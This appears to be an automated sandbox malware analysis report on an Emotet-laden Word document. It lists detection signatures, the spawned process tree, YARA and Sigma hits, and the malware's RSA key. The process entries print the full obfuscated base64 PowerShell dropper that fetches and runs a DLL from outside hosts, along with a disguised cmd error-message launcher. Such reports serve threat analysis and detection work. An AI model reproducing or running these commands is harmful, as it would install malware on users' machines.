Loading ...

Play interactive tourEdit tour

Analysis Report ARCH_25_012021.doc

Overview

General Information

Sample Name:ARCH_25_012021.doc
Analysis ID:344718
MD5:baedc37e68b58765fa52c73d0fd2c2d5
SHA1:2131d1319b5de532638d34f1e3bf68337b6099bf
SHA256:94485b3ce47d4a2df6dba8e888ca7a360763f7edd5a0448552d1d06b6e4f4baa

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2364 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2400 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2624 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2544 cmdline: powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2812 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2792 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2796 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2920 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2936 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 3044 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2468 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2448 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2844 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2500 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 3040 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.2108207451.0000000000170000.00000040.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    0000000D.00000002.2102924374.0000000000660000.00000040.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      0000000D.00000002.2102828167.00000000001E0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000008.00000002.2094445834.0000000000710000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000009.00000002.2095209420.00000000001F0000.00000040.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 25 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.rundll32.exe.1f0000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              13.2.rundll32.exe.660000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                11.2.rundll32.exe.140000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  8.2.rundll32.exe.410000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    7.2.rundll32.exe.340000.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 35 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2792, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, ProcessId: 2796
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHI